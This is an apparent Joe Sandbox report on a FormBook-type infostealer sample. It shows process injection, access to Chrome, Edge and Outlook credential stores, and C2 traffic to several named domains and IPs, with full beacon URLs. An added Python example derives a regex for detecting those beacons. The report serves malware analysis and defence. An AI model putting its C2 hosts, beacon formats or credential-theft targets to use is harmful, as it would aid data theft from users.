Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.4606386701.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4603419849.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2318504585.0000000003310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4603077046.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4604764076.0000000002BC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2319589382.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2317721202.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4603508977.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\netbtugc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: CCE 30411252024.exe | Binary or memory string: WIN_81
Source: CCE 30411252024.exe | Binary or memory string: WIN_XP
Source: CCE 30411252024.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
Source: CCE 30411252024.exe | Binary or memory string: WIN_XPe
Source: CCE 30411252024.exe | Binary or memory string: WIN_VISTA
Source: CCE 30411252024.exe | Binary or memory string: WIN_7
Source: CCE 30411252024.exe | Binary or memory string: WIN_8

            Remote Access Functionality

Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.4606386701.00000000055C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4603419849.00000000008F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2318504585.0000000003310000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4603077046.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4604764076.0000000002BC0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2319589382.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2317721202.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4603508977.0000000000930000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\CCE 30411252024.exe | Code function: 0_2_00F38C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\CCE 30411252024.exe | Code function: 0_2_00F3923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket
ATT&CK matrix, listed per tactic. A number in parentheses is the signature-count badge the report attaches to a matched technique, copied as printed; techniques without a number are the unmatched entries of the matrix.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Native API (2); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: DLL Side-Loading (1); Valid Accounts (2); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Process Injection (412); Startup Items; Scheduled Task/Job; At
Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); DLL Side-Loading (1); Valid Accounts (2); Virtualization/Sandbox Evasion (2); Access Token Manipulation (21); Process Injection (412)
Credential Access: OS Credential Dumping (1); Input Capture (21); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (2); System Information Discovery (116); Security Software Discovery (151); Virtualization/Sandbox Evasion (2); Process Discovery (3); Application Window Discovery (11); System Owner/User Discovery (1)
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: Archive Collected Data (1); Data from Local System (1); Email Collection (1); Input Capture (21); Clipboard Data (3); GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: Ingress Tool Transfer (4); Encrypted Channel (1); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement

Behavior Graph ID: 1566620 | Sample: CCE 30411252024.exe | Start date: 02/12/2024 | Architecture: WINDOWS | Score: 100

Process tree recovered from the behavior graph (signatures attached to each node follow it):

Start node: contacts www.joyesi.xyz, www.techchains.info and 16 other IPs or domains. Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 6 other signatures. Performs DNS queries to domains with low reputation (www.joyesi.xyz).
    CCE 30411252024.exe (started). Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process.
        svchost.exe (started). Signature: Maps a DLL or memory area into another process.
            UIOYLdBBxOZnTzrp.exe (injected). Signature: Found direct / indirect Syscall (likely to bypass EDR).
                netbtugc.exe (started). Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures.
                    UIOYLdBBxOZnTzrp.exe (injected). Network: www.rssnewscast.com 91.195.240.94, ports 50020, 50021, 50022 (SEDO-ASDE, Germany); elettrosistemista.zip 195.110.124.133, ports 50030, 50031, 50032 (REGISTER-ASIT, Italy); 5 other IPs or domains. Signature: Found direct / indirect Syscall (likely to bypass EDR).
                    firefox.exe (started).

Antivirus and machine-learning detection

Source | Detection | Scanner | Label
CCE 30411252024.exe | 74% | ReversingLabs | Win32.Trojan.AutoitInject
CCE 30411252024.exe | 100% | Joe Sandbox ML |

No Antivirus matches (the three further scanner tables of this section are empty)

URL | Detection | Scanner | Label
http://www.rssnewscast.com/fo8o/?U6YDsxW=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp7YHjVi2aBezyBUOenUja13YBEIShwN33HoHbXtrY+oqbh1getk=&cPm=bL-XkPyPkF | 100% | Avira URL Cloud | malware
https://www.empowermedeco.com/fo8o/?U6YDsxW=mxnR (URL cut off in the report) | 0% | Avira URL Cloud | safe
http://www.magmadokum.com/fo8o/?cPm=bL-XkPyPkF&U6YDsxW=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjNWAySNtnq/EMXCTP7S4oEh8mb9sAZyquFiTVTuU6HpMKOeASrGw= | 0% | Avira URL Cloud | safe
http://www.goldenjade-travel.com/fo8o/?cPm=bL-XkPyPkF&U6YDsxW=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxgszkgIsi8wfa6/CPqkeX1kME9DjI2TvouO65OvKk6Nl8OEvQ/8= | 100% | Avira URL Cloud | malware
http://www.empowermedeco.com/fo8o/?U6YDsxW=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&cPm=bL-XkPyPkF | 0% | Avira URL Cloud | safe
http://www.elettrosistemista.zip/fo8o/?cPm=bL-XkPyPkF&U6YDsxW=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMgl3a4mkxzPbkN9BQKjpJMF6ezHcknvvvjzNmyPcHDwhODu1wVk= | 100% | Avira URL Cloud | malware
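The URLs in the scanner table above all have the same shape: a short path segment (/fo8o/), a query parameter whose value is identical in every request (cPm=bL-XkPyPkF) and a second parameter carrying a base64-like blob that differs per request. Per-URL reputation is a weak signal for traffic like this (three of the six are rated safe by the same scanner that rates the other three as malware), while the path-plus-constant-parameter structure stays the same across the rotating hosts. The Python below is an added example and is not part of the report or of Joe Sandbox: it takes the five complete URLs from the table (the sixth, https://www.empowermedeco.com/fo8o/?U6YDsxW=mxnR, is cut off in the report and is left out), summarises the structure they share and turns it into a URL regex. The function names, the profile format and the regex it produces are this example's own.

```python
"""Derive a URI-structure detection from the C2 URLs of a sandbox report (added example).

REPORT_URLS are the complete URLs from the scanner table above. The helper
names, the profile format and the regex produced are this example's own;
nothing here is Joe Sandbox code or output.
"""
import re
from urllib.parse import urlsplit

REPORT_URLS = [
    "http://www.rssnewscast.com/fo8o/?U6YDsxW=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp7YHjVi2aBezyBUOenUja13YBEIShwN33HoHbXtrY+oqbh1getk=&cPm=bL-XkPyPkF",
    "http://www.magmadokum.com/fo8o/?cPm=bL-XkPyPkF&U6YDsxW=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjNWAySNtnq/EMXCTP7S4oEh8mb9sAZyquFiTVTuU6HpMKOeASrGw=",
    "http://www.goldenjade-travel.com/fo8o/?cPm=bL-XkPyPkF&U6YDsxW=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxgszkgIsi8wfa6/CPqkeX1kME9DjI2TvouO65OvKk6Nl8OEvQ/8=",
    "http://www.empowermedeco.com/fo8o/?U6YDsxW=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&cPm=bL-XkPyPkF",
    "http://www.elettrosistemista.zip/fo8o/?cPm=bL-XkPyPkF&U6YDsxW=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMgl3a4mkxzPbkN9BQKjpJMF6ezHcknvvvjzNmyPcHDwhODu1wVk=",
]


def split_c2_url(url):
    """Return (host, path, {key: raw value}). Values are kept raw on purpose:
    urllib's parse_qs would turn the '+' inside the base64 blobs into spaces."""
    parts = urlsplit(url)
    params = {}
    for kv in parts.query.split("&"):
        if kv:
            key, _, value = kv.partition("=")
            params[key] = value
    return parts.hostname, parts.path, params


def c2_profile(urls):
    """Summarise what every URL shares: the path, the query keys whose value
    never changes (campaign/config identifiers) and, for keys whose value does
    change, the (min, max) length of the values seen."""
    hosts, paths, param_sets = set(), set(), []
    for url in urls:
        host, path, params = split_c2_url(url)
        hosts.add(host)
        paths.add(path)
        param_sets.append(params)
    if len(paths) != 1:
        raise ValueError("URLs do not share one path: %r" % sorted(paths))
    common_keys = set.intersection(*(set(p) for p in param_sets))
    constant = {k: param_sets[0][k] for k in common_keys
                if all(p[k] == param_sets[0][k] for p in param_sets)}
    varying = {k: (min(len(p[k]) for p in param_sets), max(len(p[k]) for p in param_sets))
               for k in common_keys if k not in constant}
    return {"hosts": sorted(hosts), "path": paths.pop(),
            "constant": constant, "varying": varying}


def detection_regex(profile):
    """Regex matching any host with the profiled path and every constant
    key=value pair, in any order. The host is deliberately not part of the
    pattern because the campaign rotates domains."""
    pattern = r"^https?://[^/?#]+" + re.escape(profile["path"]) + r"\?"
    for key, value in sorted(profile["constant"].items()):
        pair = re.escape(key + "=" + value)
        pattern += r"(?=(?:[^&]*&)*" + pair + r"(?:&|$))"
    return re.compile(pattern)


PROFILE = c2_profile(REPORT_URLS)
DETECTION = detection_regex(PROFILE)


def is_c2_beacon(url):
    """True when the URL carries the campaign's path and constant parameter."""
    return DETECTION.match(url) is not None


if __name__ == "__main__":
    print("hosts seen:", ", ".join(PROFILE["hosts"]))
    print("path:", PROFILE["path"], "constant:", PROFILE["constant"], "varying:", PROFILE["varying"])
    print("regex:", DETECTION.pattern)
    for url in REPORT_URLS:
        print(is_c2_beacon(url), url[:60])
```

All five varying values have the same length (136 characters, the base64 size of a 100-byte blob), so value length is a second feature a rule can key on. The regex ignores the host on purpose: the domain table below shows the sample cycling through many domains, and a new domain carrying the same path and cPm value should still fire.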
Contacted domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
elettrosistemista.zip | 195.110.124.133 | true | false | | high
empowermedeco.com | 217.196.55.202 | true | false | | high
www.3xfootball.com | 154.215.72.110 | true | false | | high
www.goldenjade-travel.com | 116.50.37.244 | true | false | | high
www.rssnewscast.com | 91.195.240.94 | true | false | | high
www.techchains.info | 66.29.149.46 | true | false | | high
natroredirect.natrocdn.com | 85.159.66.93 | true | false | | high
www.magmadokum.com | unknown | unknown | false | | high
www.donnavariedades.com | unknown | unknown | false | | high
www.660danm.top | unknown | unknown | false | | high
www.joyesi.xyz | unknown | unknown | false | | high
www.liangyuen528.com | unknown | unknown | false | | high
www.kasegitai.tokyo | unknown | unknown | false | | high
www.empowermedeco.com | unknown | unknown | false | | high
www.k9vyp11no3.cfd | unknown | unknown | false | | high
www.elettrosistemista.zip | unknown | unknown | false | | high
www.antonio-vivaldi.mobi | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://www.rssnewscast.com/fo8o/?U6YDsxW=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNp7YHjVi2aBezyBUOenUja13YBEIShwN33HoHbXtrY+oqbh1getk=&cPm=bL-XkPyPkF | true | Avira URL Cloud: malware | unknown
http://www.empowermedeco.com/fo8o/ | false | | high
http://www.elettrosistemista.zip/fo8o/ | false | | high
http://www.goldenjade-travel.com/fo8o/?cPm=bL-XkPyPkF&U6YDsxW=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFxgszkgIsi8wfa6/CPqkeX1kME9DjI2TvouO65OvKk6Nl8OEvQ/8= | true | Avira URL Cloud: malware | unknown
http://www.magmadokum.com/fo8o/ | false | | high
http://www.rssnewscast.com/fo8o/ | false | | high
http://www.magmadokum.com/fo8o/?cPm=bL-XkPyPkF&U6YDsxW=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjNWAySNtnq/EMXCTP7S4oEh8mb9sAZyquFiTVTuU6HpMKOeASrGw= | true | Avira URL Cloud: safe | unknown
http://www.elettrosistemista.zip/fo8o/?cPm=bL-XkPyPkF&U6YDsxW=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMMgl3a4mkxzPbkN9BQKjpJMF6ezHcknvvvjzNmyPcHDwhODu1wVk= | true | Avira URL Cloud: malware | unknown
http://www.empowermedeco.com/fo8o/?U6YDsxW=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKYS1O+KnDGu0Ee7a9fQq7JRnHJ6pn6i4sEdb7G20jo8euDHkgubc=&cPm=bL-XkPyPkF | true | Avira URL Cloud: safe | unknown
http://www.goldenjade-travel.com/fo8o/ | false | | high
http://www.techchains.info/fo8o/ | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://duckduckgo.com/chrome_newtab | netbtugc.exe, 00000006.00000003.2524613758.00000000077FD000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/ac/?q= | netbtugc.exe, 00000006.00000003.2524613758.00000000077FD000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | netbtugc.exe, 00000006.00000003.2524613758.00000000077FD000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | netbtugc.exe, 00000006.00000003.2524613758.00000000077FD000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | netbtugc.exe, 00000006.00000003.2524613758.00000000077FD000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.empowermedeco.com | UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4606386701.000000000561E000.00000040.80000000.00040000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/ | netbtugc.exe, 00000006.00000003.2524613758.00000000077FD000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_ | netbtugc.exe, 00000006.00000002.4605259560.000000000435E000.00000004.10000000.00040000.00000000.sdmp, netbtugc.exe, 00000006.00000002.4606811514.0000000005F40000.00000004.00000800.00020000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4604826888.0000000003D4E000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://www.sedo.com/services/parking.php3 | UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4604826888.0000000003D4E000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://ac.ecosia.org/autocomplete?q= | netbtugc.exe, 00000006.00000003.2524613758.00000000077FD000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://codepen.io/uzcho_/pens/popular/?grid_type=list | netbtugc.exe, 00000006.00000002.4605259560.0000000004682000.00000004.10000000.00040000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4604826888.0000000004072000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://codepen.io/uzcho_/pen/eYdmdXw.css | netbtugc.exe, 00000006.00000002.4605259560.0000000004682000.00000004.10000000.00040000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4604826888.0000000004072000.00000004.00000001.00040000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | netbtugc.exe, 00000006.00000003.2524613758.00000000077FD000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://www.empowermedeco.com/fo8o/?U6YDsxW=mxnR | netbtugc.exe, 00000006.00000002.4605259560.0000000004CCA000.00000004.10000000.00040000.00000000.sdmp, UIOYLdBBxOZnTzrp.exe, 0000000C.00000002.4604826888.00000000046BA000.00000004.00000001.00040000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | netbtugc.exe, 00000006.00000003.2524613758.00000000077FD000.00000004.00000020.00020000.00000000.sdmp | false | | high
• No. of IPs < 25%
• 25% < No. of IPs < 50%
• 50% < No. of IPs < 75%
• 75% < No. of IPs
IP | Domain | Country | ASN | ASN Name | Malicious
91.195.240.94 | www.rssnewscast.com | Germany | 47846 | SEDO-ASDE | false
154.215.72.110 | www.3xfootball.com | Seychelles | 132839 | POWERLINE-AS-APPOWERLINEDATACENTERHK | false
195.110.124.133 | elettrosistemista.zip | Italy | 39729 | REGISTER-ASIT | false
116.50.37.244 | www.goldenjade-travel.com | Taiwan; Republic of China (ROC) | 18046 | DONGFONG-TWDongFongTechnologyCoLtdTW | false
85.159.66.93 | natroredirect.natrocdn.com | Turkey | 34619 | CIZGITR | false
66.29.149.46 | www.techchains.info | United States | 19538 | ADVANTAGECOMUS | false
217.196.55.202 | empowermedeco.com | Norway | 29300 | AS-DIRECTCONNECTNO | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1566620
Start date and time: 2024-12-02 14:29:47 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 54s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 18
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 2
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: CCE 30411252024.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@7/3@16/7
EGA Information:
• Successful, ratio: 75%
HCA Information:
• Successful, ratio: 97%
• Number of executed functions: 47
• Number of non-executed functions: 298
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, tse1.mm.bing.net, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target UIOYLdBBxOZnTzrp.exe, PID 876 because it is empty
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: CCE 30411252024.exe
Time | Type | Description
08:31:34 | API Interceptor | 8465176x Sleep call for process: netbtugc.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
91.195.240.94 | Certificate 11-18720.exe | Get hash | malicious | FormBook | Browse | www.rssnewscast.com/fo8o/
91.195.240.94 | Certificate 11-19AIS.exe | Get hash | malicious | FormBook | Browse | www.rssnewscast.com/fo8o/
91.195.240.94 | Certificate 11-21AIS.exe | Get hash | malicious | FormBook | Browse | www.rssnewscast.com/fo8o/
91.195.240.94 | Certificate 1045-20-11.exe | Get hash | malicious | FormBook | Browse | www.rssnewscast.com/fo8o/
91.195.240.94 | Certificate 719A1120-2024.exe | Get hash | malicious | FormBook | Browse | www.rssnewscast.com/fo8o/
91.195.240.94 | Certificate 64411-18.exe | Get hash | malicious | FormBook | Browse | www.rssnewscast.com/fo8o/
91.195.240.94 | Certificate 11-17.exe | Get hash | malicious | FormBook | Browse | www.rssnewscast.com/fo8o/
91.195.240.94 | Certificate 11-142024.exe | Get hash | malicious | FormBook | Browse | www.rssnewscast.com/fo8o/
91.195.240.94 | rDocument11-142024.exe | Get hash | malicious | FormBook | Browse | www.rssnewscast.com/fo8o/
91.195.240.94 | glued.hta | Get hash | malicious | FormBook | Browse | www.rssnewscast.com/fo8o/
154.215.72.110 | wOoESPII08.exe | Get hash | malicious | FormBook | Browse | www.3xfootball.com/fo8o/?xVY=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q==&Nz=LPhpDRap3
154.215.72.110 | N2sgk6jMa2.exe | Get hash | malicious | FormBook | Browse | www.3xfootball.com/fo8o/?qD=FrMTb&aZ=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=
154.215.72.110 | Document 151-512024.exe | Get hash | malicious | FormBook | Browse | www.3xfootball.com/fo8o/?4h8=YPQX8Tch&FBEd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzPSqftK5Z9AZjHO4n69vlG+dhBZ38Q==
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
www.3xfootball.com | Certificate 11-18720.exe | Get hash | malicious | FormBook | Browse | 154.215.72.110
www.3xfootball.com | Certificate 11-19AIS.exe | Get hash | malicious | FormBook | Browse | 154.215.72.110
www.3xfootball.com | Certificate 11-21AIS.exe | Get hash | malicious | FormBook | Browse | 154.215.72.110
www.3xfootball.com | Certificate 1045-20-11.exe | Get hash | malicious | FormBook | Browse | 154.215.72.110
www.3xfootball.com | Certificate 719A1120-2024.exe | Get hash | malicious | FormBook | Browse | 154.215.72.110
www.3xfootball.com | Certificate 20156-2024.exe | Get hash | malicious | FormBook | Browse | 154.215.72.110
www.3xfootball.com | Certificate 11-18720.exe | Get hash | malicious | FormBook | Browse | 154.215.72.110
www.3xfootball.com | RvJVMsNLJI.exe | Get hash | malicious | FormBook | Browse | 154.215.72.110
www.3xfootball.com | Certificate 64411-18.exe | Get hash | malicious | FormBook | Browse | 154.215.72.110
www.3xfootball.com | Certificate 11-17.exe | Get hash | malicious | FormBook | Browse | 154.215.72.110
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
POWERLINE-AS-APPOWERLINEDATACENTERHK | sh4.nn.elf | Get hash | malicious | Mirai, Okiru | Browse | 154.209.101.20
POWERLINE-AS-APPOWERLINEDATACENTERHK | powerpc.nn.elf | Get hash | malicious | Mirai, Okiru | Browse | 156.230.73.250
POWERLINE-AS-APPOWERLINEDATACENTERHK | mpsl.elf | Get hash | malicious | Mirai | Browse | 156.253.186.202
POWERLINE-AS-APPOWERLINEDATACENTERHK | la.bot.arm.elf | Get hash | malicious | Mirai | Browse | 45.13.160.66
POWERLINE-AS-APPOWERLINEDATACENTERHK | loligang.mpsl.elf | Get hash | malicious | Mirai | Browse | 154.220.159.10
POWERLINE-AS-APPOWERLINEDATACENTERHK | botx.m68k.elf | Get hash | malicious | Mirai | Browse | 154.203.73.133
POWERLINE-AS-APPOWERLINEDATACENTERHK | botx.sh4.elf | Get hash | malicious | Mirai | Browse | 154.218.51.85
POWERLINE-AS-APPOWERLINEDATACENTERHK | arm7.elf | Get hash | malicious | Mirai | Browse | 156.251.7.143
POWERLINE-AS-APPOWERLINEDATACENTERHK | x86.elf | Get hash | malicious | Mirai | Browse | 156.242.206.41
POWERLINE-AS-APPOWERLINEDATACENTERHK | arm.nn.elf | Get hash | malicious | Mirai, Okiru | Browse | 202.165.121.202
REGISTER-ASIT | ZAMOWIEN.BAT.exe | Get hash | malicious | FormBook, GuLoader | Browse | 195.110.124.133
